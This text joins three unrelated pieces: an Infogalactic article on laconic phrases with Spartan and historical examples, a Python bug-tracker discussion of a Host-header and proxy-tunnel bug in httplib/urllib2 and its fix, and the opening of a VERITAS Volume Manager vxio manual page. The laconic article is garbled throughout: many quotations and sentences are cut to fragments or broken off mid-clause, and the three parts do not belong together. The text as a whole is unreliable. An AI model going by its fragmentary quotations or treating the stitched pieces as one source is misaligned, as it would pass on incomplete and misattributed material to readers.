Laconic phrase A laconic phrase or laconism is a concise or terse statement, especially a blunt and elliptical rejoinder.[1][2] It is named after Laconia, the region of Greece including the city of Sparta, whose inhabitants had a reputation for verbal austerity and were famous for their blunt and often pithy remarks. Contents Uses A laconic phrase may be used for efficiency (as in military jargon), for philosophical reasons (especially among thinkers who believe in minimalism, such as Stoics), or to better deflate a pompous individual (a famous example being at the Battle of Thermopylae). In humour The Spartans were especially famous for their dry, understated wit, which is now known as "laconic humor."[note 1] This can be contrasted with the "Attic salt" or "Attic wit," the refined, poignant, delicate humour of Sparta's chief rival Athens. History Spartans focused less than other Greeks on the development of education, arts, and literature.[5] Some view this as having contributed to the characteristically blunt Laconian speech. However, Socrates, in Plato's dialogue Protagoras,".[6][note 2] Socrates was known to have admired Spartan laws,[7] as did many other Athenians,[8] but modern scholars have doubted the seriousness of his attribution of a secret love of philosophy to Spartans.[9].[10] Examples Spartan - A witticism attributed to Lycurgus, the legendary lawgiver of Sparta, was a response to a proposal to set up a democracy there: "Begin with your own family."[11] - On another occasion, Lycurgus was reportedly asked the reason for the less-than-extravagant size of Sparta's sacrifices to the gods. He replied, "So that we may always have something to offer."[11] - When he was consulted on how Spartans might best forestall invasion of their homeland, Lycurgus advised, "By remaining poor, and each man not desiring to possess more than his fellow."[11] - When asked whether it would be prudent to build a defensive wall enclosing the city, Lycurgus answered, "A city is well-fortified which has a wall of men instead of brick."[11] - Responding to a visitor who questioned why they put their fields in the hands of the helots rather than cultivate them themselves, Anaxandridas explained, "It was by not taking care of the fields, but of ourselves, that we acquired those fields."[12] - King Demaratus, being annoyed by someone pestering him with a question concerning who the most exemplary Spartan was, answered "He that is least like you."[11] - On her husband Leonidas's departure for battle with the Persians at Thermopylae, Gorgo, Queen of Sparta asked what she should do. He advised her: "Marry a good man and bear good children."[13][14] - When Leonidas was in charge of guarding the narrow mountain pass at Thermopylae with just 7,000 Greeks".[15] It was adopted."[16] - with “So much the better, we'll fight in the shade”.[17]."[18] -."[19] - When asked by a woman from Attica, "Why are you Spartan women the only ones who can rule men?", Gorgo replied, "Because we are also the only ones who give birth to men."[11][20] - "..."[21] - Polycratidas was one of several Spartans sent on a diplomatic mission to some Persian generals, and being asked whether they came in a private or a public capacity, answered, "If we succeed, public; if not, private."[11] - Following the disastrous sea battle of Cyzicus, the admiral Mindaros' first mate dispatched a succinct distress signal to Sparta. The message was intercepted by the Athenians and was recorded by Xenophon in his Hellenica: "Ships gone; Mindarus dead; the men starving; at our wits' end what to do".[22][23] - A visitor to Sparta expressed surprise at the plain clothing of King Agesilaus II and other Spartans. Agesilaus remarked, "From this mode of life we reap a harvest of liberty."[24] - When asked whether bravery or justice was a more important virtue, Agesilaus explained, "There is no use for bravery unless justice is present, and no need for bravery if all men are just."[25] -.)[26][note 3] - After Agesilaus was wounded in one of his many battles against Thebes, Antalcidas remonstrated, "The Thebans pay you well for having taught them to fight, which they were neither willing nor able to do before."[11][note 4] - Nearing death, Agesilaus was asked if he wanted a statue erected in his honor. He declined, saying; "If I have done anything noble, that is a sufficient memorial; if I have not, all the statues in the world will not preserve my memory."[27] -" (αἴκα).[28] Subsequently neither Philip nor his son Alexander the Great attempted to capture the city. -."[29] - When someone from Argos pointed out that Spartans were susceptible to being corrupted by foreign travel, Eudamidas replied "But you, when you come to Sparta, do not become worse, but better."[30] - Demetrius I of Macedon was offended when the Spartans sent his court a single envoy, and exclaimed angrily, "What! Have the Lacedaemonians sent no more than one ambassador?" The Spartan responded, "Aye, one ambassador to one king."[31] - After being invited to dine at a public table, the sophist Hecataeus was criticized for failing to utter a single word during the entire meal. Archidamidas answered in his defense, "He who knows how to speak, knows also when."[11] - Spartan mothers or wives gave a departing warrior his shield with the words: "With it or on it!" (Greek: Ἢ τὰν ἢ ἐπὶ τᾶς! E tan e epi tas!), implying that he should return (victoriously) with his shield, or (his dead body) upon it, but by no means after saving himself by throwing away his heavy shield and fleeing.[32][33] - The king of Pontus engaged a Spartan cook to prepare their famous black broth for him, but found it distasteful. The cook explained, "To relish this dish, one must first bathe in the Eurotas."[11] - Upon being asked to go listen to a person who could perfectly imitate a nightingale, a Spartan answered, "I have heard the nightingale itself."[34] - When an Athenian accused Spartans of being ignorant, the Spartan Pleistoanax agreed: "What you say is true. We alone of all the Greeks have learned none of your evil ways."[11] Other historical examples -."[35] - A traveler from Sybaris, a city in southern Italy (which gave rise to the word sybarite) infamous in the ancient world for its luxury and gluttony, was invited to eat in a Spartan mess hall and taste their black broth. Disgusted, he remarked, "No wonder Spartans are the bravest of men. Anyone in their right mind would rather die a thousand times than live like this."[36] - When news of the death of Philip II reached Athens in 336 BC, the strategos Phocion banned all celebratory sacrifice, saying: "The army which defeated us at Chaeronea has lost just one man."[37] - The heavy price of defeating the Romans in the Battle of Asculum (279 BC) prompted Pyrrhus to respond to an offer of congratulations with "If we win one more battle we will be doomed" ("One more such victory and the cause is lost"; in Greek: Ἂν ἔτι μίαν μάχην νικήσωμεν, ἀπολώλαμεν Án éti mían máchēn nikḗsōmen, apolṓlamen).[38] - After the execution of the Catiline conspirators in 62 BC, Cicero announced "Vixerunt" – "They have lived." (This was actually a formulaic expression that avoided direct mention of death to forestall ill fortune.)[39] -").[40] - Julius Caesar memorialized his swift victory over King Pharnaces II of Pontus in the Battle of Zela in 47 BC with a message to the Roman Senate consisting of the words "Veni, vidi, vici" ("I came, I saw, I conquered").[41] - According to a legend recorded in the Primary Chronicle for year 6472, Sviatoslav I of Kiev (circa 962–972 AD) sent a message to the Vyatich rulers, consisting of a single phrase: "I come at you!" (Old East Slavic: "Иду на вы!" Idu na vi!).[42] The chronicler may have wished to contrast Sviatoslav's open declaration of war to stealthy tactics employed by many other early medieval conquerors. This phrase is used in modern Russian to denote an unequivocal declaration of one's intentions. -"). - In 1809, during the second siege of Saragossa, the French demanded the city's surrender with the message "Peace and Surrender" ("Paz y capitulación"). General Palafox's reply was "War and knife" ("Guerra y cuchillo", often mistranslated as "War to the Knife").] - When asked to surrender the Imperial Guard during the Battle of Waterloo, General Cambronne is recorded as replying: La Garde meurt, elle ne se rend pas - "The Guard dies, it does not surrender". Some sources also record his response as the single word Merde (literally, shit, but it can also be roughly translated as "Go to Hell").[43] Merde is still euphemistically referred to in French as le mot de Cambronne- Cambronne's word. - During the early 20th century struggle for central Arabia between the families of Al Rashid and Al Saud, Shaykh Abdul Aziz Al Rashid wrote to King Abdul Aziz Al Saud suggesting that rather than having their armies battle, the two leaders should settle the matter through single combat. The king replied with a one-line letter "From Abdul Aziz the living to Abdul Aziz the dead."[citation needed] - In 1843, after annexing the then-Indian village Miani of Sindh against orders, a (likely apocryphal) story tells that British General Sir Charles Napier sent home a one word telegram, "Peccavi", taking use of its Latin meaning "I have sinned" and the heterograph "I have Sindh."[44] - A similar (possibly apocryphal) story has Lord Dalhousie annexing Oudh and sending a one word telegram, 'Vovi' , translated as 'I have vowed' (Oudh and vowed are heterographs). [45] - "!".[46][47] - Shortly after taking command of the French 9th Army during the early stages of the First World War, General Ferdinand Foch summarised his situation with the words "My center is giving way, my right is in retreat. Situation excellent. I attack." [48] - On October 27, 1917, violinist Mischa Elman and pianist Leopold Godowsky listened in Carnegie Hall as sixteen-year-old violin prodigy Jascha Heifetz gave his first U.S. performance. At intermission, Elman wiped his brow and remarked "It's awfully hot in here", to which Godowsky retorted, “Not for pianists!”[49] - On October 28, 1918, the Austro-Hungarian emperor Charles I of Austria tried to persuade the Slovene leader Anton Korošec not to join an independent Yugoslav State by offering to establish an autonomous United Slovenia within the Habsburg Monarchy. Korošec replied in German: Es ist zu spät, Majestät ("It is too late, your Majesty") and then, according to his own account, slowly left the room. The State of Slovenes, Croats and Serbs was declared the next day with Korošec as its de facto leader.[citation needed] - American."[50] - Nobel Prize-winning British physicist Paul Dirac was notoriously taciturn.[note 5] During the question period after a lecture he gave at the University of Toronto, a member of the audience remarked that he hadn't understood part of a derivation. There followed a long and increasingly awkward silence. When the host finally prodded him to respond, Dirac simply said, "That was a statement, not a question."[51] - Austrian physicist Wolfgang Pauli (also a Nobel laureate), known as the conscience of the physics world for his colorful objections to incorrect or sloppy thinking, was shown a young physicist's paper and lamented, "[This is so bad,] it is not even wrong."[52] -”.[53] -.[54] - During the Battle of Arnhem, Walter Model,] - During the December 1944 Battle of Bastogne, part of the Battle of the Bulge, the 101st Airborne in and around Bastogne was surrounded by enemy forces. The Germans sent the Americans a party of envoys with an ultimatum: surrender or face "certain annihilation". The German officer in charge was perplexed when General Anthony McAuliffe replied with one word: "Nuts!"[note 6] -."[56] He also reportedly said, "Great. Now we can shoot at those bastards from every direction." See also Notes - ↑ Australia is often cited as a modern stronghold of such humor.[3][4] - ↑ under Persian dominion. frequently with the same opponents, lest by doing so it should school them in military arts. This transgression led to the downfall of Sparta after its defeat by Thebes This began early. When Dirac was a child, his authoritarian father, a teacher of French, enforced a rule that Dirac speak to him only in French, as a device to encourage him to learn the language. But since young Dirac had difficulty expressing himself in French, the result was he spoke very little. - ↑ When the German officer had to ask, "Is the reply negative or affirmative?", it was explained to him as being equivalent to "Go to hell."[55] References - ↑ Merriam-Webster's Dictionary of Synonyms, 1984, s.v. 'concise' p. 172 - ↑ Henry Percy Smith, Synonyms Discriminated (1904) p. 541 - ↑ Willbanks, R. (1991). Australian Voices: Writers and Their Work. University of Texas Press. p. 117. ISBN 978-0-292-78558-8. OCLC 23220737. - ↑ Bell, S.; Bell, K.; Byrne, R. (2013). "Australian Humour: What Makes Aussies Laugh?". Australian Tales. Australian-Information-Stories.com. Archived from the original on 2013-01-22. Retrieved 2014-08-30. - ↑ Plato, Hippias Major 285b-d. - ↑ Protagoras 342b, d-e, from the translation given at the end of the section on Lycurgus in e-classics.com. - ↑ Plato, Crito 52e. - ↑ Plato, Republic 544c. - ↑. - ↑ Paul Cartledge (2003). Spartan Reflections. University of California Press. p. 85. ISBN 978-0-520-23124-5. Retrieved 13 December 2012. - ↑ 11.00 11.01 11.02 11.03 11.04 11.05 11.06 11.07 11.08 11.09 11.10 Plutarch: Life of Lycurgus 1 2 3 - 2014-09-20. - ↑ Plutarch, Apophthegmata Laconica, 210a - ↑ Plutarch, Apophthegmata Laconica, 213c - ↑ Plutarch, Parallel Lives, "Agesilaus", 15.6.123 - ↑ Plutarch, Apophthegmata Laconica, 215a - ↑ Plutarch, "De garrulitate, 17" 1 2 or 3 - 2011-11-21. -. Missing or empty |title=(help) - ↑ William S. Walsh (1892). Handy-Book of Literary Curiosities. Philadelphia: J.B. Lipincott Co. p. 600. - ↑ Writing, Not (2007-01-18). "The Shortest Complete Sentence in the English Language". Humanities 360. Helium Publishing. Archived from the original on 2014-06-13. Retrieved 2014-06-13. - ↑ Neiberg, Michael (2003). "Foch: Supreme Allied Commander in the Great War". Brassey's. ISBN 1-57488-672-X. - ↑ Nicholas, Jeremy. "Wit and Wisdom".. Archived from the original on 2008-01-07. Retrieved 2007-10-02. - ↑ Peierls R (1960). "Wolfgang Ernst Pauli, 1900-1958". Biographical memoirs of fellows of the Royal Society. Royal Society (Great Britain). S.L. A. Marshall, Bastogne: The First Eight Days, Chapter 14, detailing and sourcing the incident. - ↑ Russ, Martin (1999). Breakout – The Chosin Reservoir Campaign, Korea, 1950. Penguin Books. p. 230. ISBN 0-14-029259-4.
https://infogalactic.com/info/Laconic
CC-MAIN-2018-43
refinedweb
2,450
61.87
This is a project we worked on at Intel IoT Roadshow 2016. The Intel Edison compute chip is a rather powerful board with built in WiFi and bluetooth capabilities. This makes it perfect for some slightly more intensive IoT applications. I used a google cardboard and mapped the user's head movements to a camera mounted on a servo motor, making it look like a full 360 degree video. Step 1: One the Phone I used Trinus VR to display a camera feed from my laptop to my phone. Trinus also translates head movement to mouse pointer movement, which we can then capture. Trinus requires a mobile app that is compatible with google cardboard, and a desktop app. Download and install them. Step 2: On Your PC Since Trinus moved the mouse pointer based on head rotation, I could capture this mouse movement and use it to sent requests to the Edison. I did this with a little Python script that uses the win32 api to capture the mouse position every few milliseconds and make a get request to the nodejs server running on the Edison. Here is the code: import win32api import time import urllib2 running = True width = win32api.GetSystemMetrics(0)/2 height = win32api.GetSystemMetrics(1)/2 while(running): x, y = win32api.GetCursorPos() win32api.SetCursorPos((width,height)) if(x-width >= 100 or y-height >=100): print "Vert: %s, Hor: %s" % (x-width, y-height); time.sleep(0.1) if(x-width>5): urllib2.urlopen("") if(x-width<-5): urllib2.urlopen("") Step 3: On the Edison The Intel Edison compute chip runs a full linux distro called Yocto. It also comes with Nodejs as well as a bunch of preinstalled libraries for interacting with the hardware ports. Code: var express = require("express") var app = express() var mraa = require("mraa") var pwm = new mraa.Pwm(3) var groveSensor = require('jsupm_grove'); var led = new groveSensor.GroveLed(6); var led2 = new groveSensor.GroveLed(5); pwm.enable(true); pwm.period_us(2000); var value = 30; //pwm.write(value); app.get('/', function (req, res) { res.send('Hello World!'); }); app.get('/right', function (req, res){ pwm.write(0); setTimeout(function(){pwm.write(3);console.log("IT IS DONE");}, 100); led2.on(); setTimeout(function(){led2.off();},100); res.send('ryt'); }) app.get('/left', function(req, res){ console.log('hit') res.send('left'); led.on(); setTimeout(function(){led.off();}, 100); //insert action here }) app.get('/stop', function (req, res){ pwm.write(5); // setTimeout(function(){pwm.write(3);console.log("IT IS DONE");}, 100); res.send('stoppin'); }) var server = app.listen(8081, function () { var host = server.address().address var port = server.address().port console.log("Example app listening at", host, port) }) Stick this in a javascript file and run it. I also used a Grove starter kit to power two LEDs and a servo motor that had the webcam mounted on it. The webcam feed is then streamed and can be accessed from any browser. This repo has a great way to implement the stream. Discussions
https://www.instructables.com/id/Virtual-Reality-Telepresence-With-Intel-Edison/
CC-MAIN-2019-09
refinedweb
496
68.67
In previous articles, we learned how to create a sitemap for the Django website. A valid sitemap increases your website's search engine ranking. Hence good for search engine optimization. Similarly, adding a robot.txt file is good for your website. It tells crawlers, which page to crawl and which page not to crawl for indexing. In this article, we will see how to generate RSS feed on your Django website. The RSS feed help to keep up readers with their favorite blogs, news sites, and other websites. RSS allows the content and new updates to come to the reader. Generally, you use RSS to syndicate or subscribe to the feed of a website, blog or almost any media content that is updated online Create a file in your app directory, parallel to urls.py file and name it feeds.py. Paste the below code in it. In the below sample example, we are fetching posts/articles from the database of pythoncircle.com. We have implemented four methods, item, item_title, item_description and item_link. The code has been updated with comments. class LatestEntriesFeed(Feed): title = "PythonCircle.com: New article for Python programmers every week" link = "/feed/" description = "Updates on changes and additions to python articles on pythoncircle.com." # return 10 recently created/updated posts def items(self): return get_recent_updated_posts(number_of_posts=10) def item_title(self, item): return item.title # return a short description of article def item_description(self, item): return item.description # create and return the article URL def item_link(self, item): return reverse('appname:index', args=(item.post_id,)) Now in your project's urls.py file (not in any app's urls.py file) add below code. from appname.feeds import LatestEntriesFeed() # add feeds path urlpatterns += [ path(r'feed/', LatestEntriesFeed()), ] Restart/Reload your Django app and go to pythoncircle.com/feed/ or localhost:8000/feed/. You can validate if RSS feed generated is valid or not.
https://pythoncircle.com/post/687/how-to-generate-atomrss-feed-for-django-website/
CC-MAIN-2021-43
refinedweb
315
60.51
Hi You want to use REST service for your search, then my advice would be to use Solr. As it has buitl-in functionality of REST API. If you want to use Lucene then below are my comments: 1. In do search function, you are creating reader object. If this call is invoked for every query then it would be very expensive. You need to create it once globally and re opon it, if the index is modified. Its better use SearchManager. Regards Aditya - Search from 1 Million open source projects. On Thu, Sep 5, 2013 at 6:46 AM, David Miranda <david.b.miranda@gmail.com>wrote: > Hi, > > I'm developing a web application, that contains a REST service in the > Tomcat, that receives several requests per second. > The REST requests do research in a Lucene index, to do this i use the > IndexSearch. > > My questions are: > - There are concurrency problems in multiple research? > - What the best design pattern to do this? > > public class IndexResearch(){ > > private static int MAX_HITS = 500; > > private static String DIRECTORY = "indexdir"; > > private IndexSearcher searcher; > > private StandardAnalyzer analyzer; > > > > > > > public IndexResearch(){ > > } > > public String doSearch(String text){ > > analyzer = new StandardAnalyzer(Version.LUCENE_43); > > topic = QueryParser.escape(topic); > > Query q = new QueryParser(Version.LUCENE_43, "field", analyzer > > ).parse(text); > > File indexDirectory = new File(DIRECTORY); > > IndexReader reader; > > reader = DirectoryReader.open(FSDirectory.open(indexDirectory)); > > searcher = new IndexSearcher(reader); > > > /*more code*/ > > > } > > } > > > Can I create, in the servlet, one object of this class per client request > (Is that the best design pattern)? > > Thanks in advance. >
http://mail-archives.us.apache.org/mod_mbox/lucene-java-user/201309.mbox/%3CCAE9W93MP2SoT=ib+v4XxDLEsrn8R4DMyP5s3ZFRAj9tcd=AkGw@mail.gmail.com%3E
CC-MAIN-2019-22
refinedweb
250
59.9
Created on 2010-01-25 04:34 by cameron, last changed 2014-05-19 21:59 by orsenthil. This issue is now closed. I'm trying to do HTTPS via a proxy in Python 2.6.4 (which is supposed to incorporate this fix from issue 1424152). While trying to debug this starting from the suds library I've been reading httplib.py and urllib2.py to figure out what's going wrong and found myself around line 687 of httplib.py at the _tunnel() function. _tunnel() is broken because _set_hostport() has side effects. _tunnel() starts with: self._set_hostport(self._tunnel_host, self._tunnel_port) to arrange that the subsequent connection is made to the proxy host and port, and that is in itself ok. However, _set_hostport() sets the .host and .port attributes in the HTTPConnection object. The next action _tunnel() takes is to send the CONNECT HTTP command, filling in the endpoint host and port from self.host and self.port. But these values have been overwritten by the preceeding _set_hostport() call, and so we ask the proxy to connect to itself. It seems to me that _tunnel() should be grabbing the original host and port before calling _set_hostport(), thus: ohost, oport = self.host, self.port self._set_hostport(self._tunnel_host, self._tunnel_port) self.send("CONNECT %s:%d HTTP/1.0\r\n\r\n" % (ohost, oport)) In fact the situation seems even worse: _tunnel() calls send(), send() calls connect(), and connect() calls _tunnel() in an infinite regress. - Cameron Simpson Amendment: regarding the infinite regress, it looks like there will not be a recursion if the caller leaps straight to the .connect() method. However, if they do that then the call to _tunnel() from within connect() will happen _after_ the socket is made directly to the origin host, not via the proxy. So the behaviour seems incorrect then also; it looks very much like _tunnel() must always be called before the real socket connection is established, and .connect() calls _tunnel() afterwards, not before. It's looking like I have my idea of .host versus ._tunnel_host swapped. I think things are still buggy, but my interpretation of the bug is wrong or misleading. I gather that after _set_tunnel(), .host is the proxy host and that ._tunnel_host is the original target host. I'll follow up here in a bit when I've better characterised the problem. I think I'm letting urllib2's complicated state stuff confuse me too... Well, I've established a few things: - I'm mischaracterised this issue - httplib's _set_tunnel() is really meant to be called from urllib2, because using it directly with httplib is totally counter intuitive - a bare urllib2 setup fails with its own bug To the first item: _tunnel() feels really fragile with that recursion issue, though it doesn't recurse called from urllib2. For the second, here's my test script using httplib: H = httplib.HTTPSConnection("localhost", 3128) print H H._set_tunnel("localhost", 443) H.request("GET", "/boguspath") os.system("lsof -p %d | grep IPv4" % (os.getpid(),)) R = H.getresponse() print R.status, R.reason As you can see, one builds the HTTPSConnection object with the proxy's details instead of those of the target URL, and then put the target URL details in with _set_tunnel(). Am I alone in find this strange? For the third, my test code is this: U = urllib2.Request('') U.set_proxy('localhost:3128', 'https') f = urllib2.urlopen(R) print f.read() which fails like this: Traceback (most recent call last): File "thttp.py", line 15, in <module> f = urllib2.urlopen(R) File "/opt/python-2.6.4/lib/python2.6/urllib2.py", line 131, in urlopen return _opener.open(url, data, timeout) File "/opt/python-2.6.4/lib/python2.6/urllib2.py", line 395, in open protocol = req.get_type() AttributeError: HTTPResponse instance has no attribute 'get_type' The line numbers are slightly off because I've got some debugging statements in there. Finally, I flat out do not understand urllib2's set_proxy() method: def set_proxy(self, host, type): if self.type == 'https' and not self._tunnel_host: self._tunnel_host = self.host else: self.type = type self.__r_host = self.__original self.host = host When my code calls set_proxy, self.type is None. Now, I had naively expected the first branch to be the only branch. Could someone explain what's happening here, and what is meant to happen? I'm thinking that this bug may turn into a doc fix instead of a behaviour fix, but I'm finding it surprisingly hard to know how urllib2 is supposed to be used. As you noticed, the _set_tunnel method is a private method not intended to be used directly. Its being used by urllib2 when https through proxy is required. urllib2 works like this, it reads HTTPS_PROXY environment variable (in turn includes HTTPSProxyHandler and HTTPSProxyAuthenticationHandler) and then try to do a urlopen on an https:// url or a request object through the tunnel doing a CONNECT instead of a GET. How do think the docs can be improved? If you have any suggestions please upload a patch. Thanks. Well, following your description I've backed out my urllib2 test case to this: f = urllib2.urlopen('') os.system("lsof -p %d | grep IPv4" % (os.getpid(),)) f = urllib2.urlopen(R) print f.read() and it happily runs HTTPS through the proxy if I set the https_proxy envvar. So it's all well and good for the "just do what the environment suggests" use case. However, my older test: U = urllib2.Request('') U.set_proxy('localhost:3128', 'https') f = urllib2.urlopen(R) print f.read() still blows up with: File "/opt/python-2.6.4/lib/python2.6/urllib2.py", line 381, in open protocol = req.get_type() AttributeError: HTTPResponse instance has no attribute 'get_type' Now, this is the use case for "I have a custom proxy setup for this activity". It seems a little dd that "req" above is an HTTPResponse instead of a Request, and that my be why there's no .ettype() method available. I also see nothing obviously wrong with my set_proxy() call above based on the docs for the .set_proxy() method, though obviously it fails. I think what may be needed is a small expansion of the section in the Examples are on proxies. There's an description of the use of the *_proxy envvars there (and not elsewhere, which seems wrong) and an example of providing a proxy Handler. An addition example with a functioning use of a bare .set_proxy() might help. Cameron could you provide a patch for this? Ok,. I have attached a patch that should fix the issue. New patch revision, this time includes unit tests. I've updated the patch again to fix a problem with HTTPSConnection. Rebased patch on current tip. A few comments - Your docstring for set_tunnel claims the method sends CONNECT when it in fact doesn't touch the network at all. - Instead of 3 parallel arrays for tunnel information, it would be better to have a TunnelInfo class to contain host/port/headers (perhaps a namedtuple?). Thanks for the review! I've attached an updated patch. An update to the set_tunnel library documentation is being discussed in issue 11448. I'm not sure how to best handle the overlap. Maybe the best way is to first deal with issue 11448, and then add the changes resulting from this issue? Hmm. I think I found another problem... please wait for another patch revision. Ok, I've attached yet another patch revision. This revision is less complex, because it gets rid of the ability to set up chains of tunnels. The only reason that I put that in was to preserve backward compatibility -- but upon reviewing the old implementation again, I found out that this actually did not work in the past either. Refreshed patch. I am reviewing this patch right now and you will see my action soon. It is completely and I am reviewing to validating the technical details/fix. Thanks for patch, Nikolaus. I verified the patch and this indeed corrects a nasty bug in sending a wrong header when doing it a lower level HTTPSConnection to proxy and set_tunnel (bad term) to the end host..I was worried as why we did not observe this earlier and it seems to me that the advertised way to do HTTPS CONNECT is via Proxy Handler or urllib.request and when doing it via a ProxyHandler, these wierdly named action (set_tunnel) happen underneath, but the skip_hosts bit is set as we got headers from the higher level method. and the host header is carried transparently to the tunnel connection request and thus we escaped this. The patch fixes the problem and cleans up a bit. Thanks for that , Nikolaus. This code (http/client.py) will require more attention beyond this bug too. New changeset 39ee3286d187 by Senthil Kumaran in branch '3.4': Issue #7776: Fix ``Host:'' header and reconnection when using http.client.HTTPConnection.set_tunnel(). New changeset 2c9af09ba7b8 by Senthil Kumaran in branch 'default': merge from 3.4 This is fixed in 3.4 and 3.5 (finally). I will port it to 2.7 as well. I get errors when using pip with a proxy in 3.4.1rc1 on Windows, that does not happen on 3.4.0. I tracked it down to this change to client.py. OK with client.py from fd2c69cedb25, but not with client.py from 39ee3286d187. C:\Python34\Scripts>set HTTP_PROXY= C:\Python34\Scripts>set HTTPS_PROXY= C:\Python34\Scripts>pip -v install simplejson Downloading/unpacking simplejson Could not fetch URL: connection err or: hostname 'openwrt.lan' doesn't match either of '*.c.ssl.fastly.net', 'c.ssl. fastly.net', '*.target.com', '*.vhx.tv', '*.snappytv.com', '*.atlassian.net', 'p laces.hoteltonight.com', 'secure.lessthan3.com', '*.atlassian.com', 'a.sellpoint .net', 'cdn.upthere.com', '*.tissuu.com', '*.issuu.com', '*.kekofan.com', '*.pyt hon.org', '*.theverge.com', '*.sbnation.com', '*.polygon.com', '*.twobrightlight s.com', '*.2brightlights.info', '*.vox.com', 'staging-cdn.upthere.com', '*.zeebo x.com', '*.beamly.com', '*.aticpan.org', 'stream.svc.7digital.net', 'stream-test .svc.7digital.net', '*.articulate.com', 's.t.st', 'vid.thestreet.com', '*.planet -labs.com', '*.url2png.com', 'turn.com', '', 'rivergathering.org', ' social.icfglobal2014-europe.org', '*.innogamescdn.com', '*.pathable.com', '*.sta ging.pathable.com', '*.kickstarter.com', 'sparkingchange.org', '' , '', 'js-agent.newrelic.com', '*.fastly-streams.com', 'cdn.bran disty.com', 'fastly.hightailcdn.com', '*.fl.yelpcdn.com', '*.feedmagnet.com', 'a pi.contentbody.com', '*.acquia.com', '*.swarmapp.com', '*.lonny.com', '*.stylebi stro.com', '*.zimbio.com', '*.pypa.io', 'pypa.io', 'static.qbranch.se', '*.krxd. net', '*.room.co', '*.metrological.com', 'room.co', '', 'my.ibmserviceengage.com', 'cdn.evbuc.com', 'cdn.adagility.com' Will skip URL when looking for down load links for simplejson On 05/09/2014 02:02 PM, Cybjit wrote: > C:\Python34\Scripts>pip -v install simplejson > Downloading/unpacking simplejson > Could not fetch URL: connection err > or: hostname 'openwrt.lan' doesn't match either of '*.c.ssl.fastly.net', 'c.ssl. This looks as if pip tries to match the hostname in the certificate from pypi.python.org against the hostname of the local proxy. Looking at the code, I don't see why it would do that though. HTTPSConnection.connect definitely tries to match against the final hostname. Is pip maybe doing its own certificate check, and relying on HTTPSConnection.host to contain the final hostname rather than the proxy? On 2014-05-10 00:23, nikratio wrote: > Is pip maybe doing its own certificate check, and relying on > HTTPSConnection.host to contain the final hostname rather than the proxy? I think the culprit might be here Cybjit <report@bugs.python.org> writes: > Cybjit added the comment: > > On 2014-05-10 00:23, nikratio wrote: >> Is pip maybe doing its own certificate check, and relying on >> HTTPSConnection.host to contain the final hostname rather than the proxy? > > I think the culprit might be here > Yes, that's the problem. I guess that nicely demonstrates why using inheritance as an API is not a good idea. I guess we nevertheless need to repair/work around this in Python 3.4? Unfortunately pip explicitly relies on _set_tunnel() to set self.host = self._tunnel_host. So we would need to change _set_tunnel() to save the original attribute somewhere, change the other methods to use the saved attribute in favor of the real one, and have connect() restore it (so that we can reconnect). This still would not allow pip to reconnect (because it overwrites the connect method), but then reconnecting a tunneled connection with pip did not work before either. Still, rather ugly. Alternatively, maybe we could also do nothing, because if pip is depending on undocumented semantics of a private method (_set_tunnel), they have to live with the consequences? Thinking about this, I think we should just revert the entire patch for 3.4, but keep it in for 3.5. That gives the pip folks enough time to fix their code. Fixing the issue in 3.4 is probably not that crucial (after all, it existed since about 2.6.« Should this be a release blocker regression for 3.4.1? dstufft, what do you think? Let me raise the issue with urllib3 and see if maybe we can get a quick turn around and just fix it for real. This is going to break existing versions of urllib3 (and thus requests and thus pip) when using verified TLS + a proxy, however future versions can work around it and a fix is being looked at right now. Once it's fixed there it can propagate to requests and then to pip. Urllib3 issue is here As far as what CPython should do. I personally don't think 3.4.1 should go out with this broken. That'll mean either getting a new pip out with the fix and bump the bundled version in CPython or revert this patch and wait till 3.5 (or 3.4.2 if you don't want to hold up 3.4.1). Just an update, the issue is fixed in urllib3 and that has been pulled into requests. Requests is currently prepping to release a new version which I'll pull into pip and issue a pip 1.5.6 release which can be pulled into CPython which should fix this. I am glad that issues with 3rdparty libs which dependent on the previous wrong behavior has been resolved. As indicated previously, I think, it makes sense to have this in 2.7 as well. I created a patch and tested it 2.7 and it is all good. I plan to commit it before the next 2.7 update (which should be tomorrow). New changeset 568041fd8090 by Senthil Kumaran in branch '2.7': Backport Fix for Issue #7776: Fix ``Host:'' header and reconnection when using http.client.HTTPConnection.set_tunnel(). This is fixed in 2.7 as well here (changeset 568041fd8090). We shall close this ticket after @dstufft pulls in the updated pip for 3.4 Thanks! Requests has been released and I've pulled it into the pip tree. I'll be releasing tonight probably, or maybe tomorrow. I tag 3.4.1 final in less than 24 hours. I really would prefer that the embedded pip not contain such, uh, fresh software. But let's try it and hope for the best. Well you're the RM Larry :) I'll do whatever you think is best. I would greatly prefer it if the pip shipped with CPython 3.4.1 wasn't broken with proxies. I think the choices are 1) Ship it with the new pip, I can give a delta of the differences if that is helpful. 2) Roll back the patch that broke the behavior 3) Ship with broken pip + proxy behavior Whichever you think is the better option is fine with me. Yeah, I'd like to see the diff. I. Just FYI, I upgraded setuptools and pip in 3.5: If you decide to go that way dunno if you can just cherry pick or not. I prefer we update the ensurepip in 3.4.1 That will be helpful too since 3.5 has the fix. @larry Is there anything else I need to do? @dstufft - should you commit it in 3.4 branch (since the change is already in 3.5) and then wait for larry's approval or rejection? Okay, this has my blessing to be merged for 3.4.1.
https://bugs.python.org/issue7776
CC-MAIN-2018-26
refinedweb
2,733
67.96
vxio(7) VxVM 3.5 vxio(7) 1 Jun 2002 NAME vxio - VERITAS Volume Manager virtual disk devices DESCRIPTION Volume devices are the virtual disk devices in VERITAS Volume Manager (VxVM). The volume devices support a virtual disk access method with disk mirroring and disk striping. A volume is a logical entity composed of one or more plexes. A read can be satisfied from any plex, while a write is directed to all plexes. The virtual disk devices have a wide variety of behaviors, which are programmable through the /dev/vx/config device. For volume devices, both block- and character-special devices are implemented. Each plex in the volume is a copy of the volume address space. The plex has subdisks associated with it. These subdisks provide backup storage for the volume address space. It is possible to create a sparse plex, which is a plex without backup storage for some of the volume address space. The areas of a sparse plex that do not have a backing subdisk are called holes. An attempt to read a hole in a sparse plex fails. If there are other plexes that have backup storage for the read, then one of those plexes is read. Otherwise, the read fails. A write to a hole in a sparse plex is considered a success even though the data can't be read back. In addition, a plex may be designated as a logging plex. This means that a log of blocks that are in transition will be kept, which enables fast recovery after a system failure. This feature is known as DRL, or dirty region logging. The log for each plex consists of a specially designated subdisk that is not part of the normal plex address space. IOCTLS The ioctl commands supported by the volume virtual disk device interface are discussed later in this section. The format for calling each ioctl command is: #include <<<<sys/types.h>>>> #include <<<<sys/volclient these ioctls, with some exceptions, is zero if the command was successful, and -1 if it was rejected. If the return value is -1, then errno is set to indicate the cause of the error. - 1 - Formatted: August 2, 2006 vxio(7) 